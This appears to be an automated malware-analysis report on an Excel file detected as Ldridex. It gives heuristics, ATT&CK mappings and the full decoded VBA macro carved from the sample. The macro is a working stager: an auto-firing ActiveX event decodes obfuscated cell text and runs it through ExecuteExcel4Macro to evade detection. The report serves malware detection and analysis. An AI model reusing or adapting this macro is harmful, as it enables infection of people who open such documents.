MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file is identified as malicious by ClamAV with the signature Xls.Malware.Ldridex-9768648-0. Static analysis reveals a VBA project containing an ActiveX event that triggers a deobfuscated Excel 4.0 macro. This macro likely serves as a stager to download and execute a secondary payload, a common characteristic of the Ldridex family.
Heuristics 3
-
ClamAV: Xls.Malware.Ldridex-9768648-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Ldridex-9768648-0
-
VBA project inside OOXML medium 1 related finding OOXML_VBADocument contains a VBA project — VBA macros present
-
VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGERVBA code attached to an auto-firing ActiveX/UserForm control event (e.g. _Layout/_Change/_Painted) decodes a string with Replace/Split/Join/StrReverse/Chr and passes the recovered formula text to ExecuteExcel4Macro. This bridges VBA event activation into XLM formula execution to call Win32 APIs / drop payloads while evading AutoOpen and Shell keyword detection — a high-confidence macro stager, not a specific Office parser CVE.
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1830 bytes |
SHA-256: 09ff2779b1bd375b618de4d972020f677c05777985db26516b346820f2cad85f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "formsA, 1, 0, MSForms, Frame"
Sub intuis()
ko = ""
End Sub
Sub printerSave()
Dim s As String
d1 = rs(Int((8 - 6 + 1) * Rnd + 6))
d2 = rs(Int((8 - 6 + 1) * Rnd + 6))
d3 = rs(Int((8 - 6 + 1) * Rnd + 6))
For i = 1112 To 1116
Do
fl = de(Cells(i, 1), Int((4 - 1 + 1) * Rnd + 1))
Loop Until Right(fl, 1) = ")"
s = fl
ExecuteExcel4Macro (repl("$", d3, "X", GSs, repl(";", d1, "'", d2, s)))
fl = ""
Next
End Sub
Function GSs()
Dim urs As String, f As Integer
g = 720: gg = 1008
i = Int((gg - g + 1) * Rnd + g)
For j = 1 To 4
If IsEmpty(Cells(i, j)) = 0 Then
urs = Cells(i, j)
f = j
Exit For
End If
Next
GSs = de(urs, f)
End Function
Function de(a As String, b As Integer) As String
Dim ab() As Byte
ab = StrConv(a, vbFromUnicode)
For Each s In ab
de = de & Chr(s + b)
Next
End Function
Function rs(Length As Long) As Variant
Dim X As Long
For X = 1 To Length
rs = rs & [MID("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz",RANDBETWEEN(1,62),1)]
Next
End Function
Function repl(a1, a2, a3, a4, y As String)
repl = Replace(y, a1, a2): repl = Replace(repl, a3, a4)
End Function
Private Sub formsA_Layout()
printerSave
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 18944 bytes |
SHA-256: 7d1112f1994beeeb354351e35b259f4e8f79905a5e86928068bd164191afeb91 |
|||
|
Detection
ClamAV:
Xls.Malware.Ldridex-9768648-0
Obfuscation or payload:
unlikely
|
|||
emf_00.emf |
ooxml-emf | OOXML EMF part: xl/media/image1.emf | 2380 bytes |
SHA-256: 6f6019f4c212e659cfc373492fd3295dfeb2173aa7e19673efcf65539049af00 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.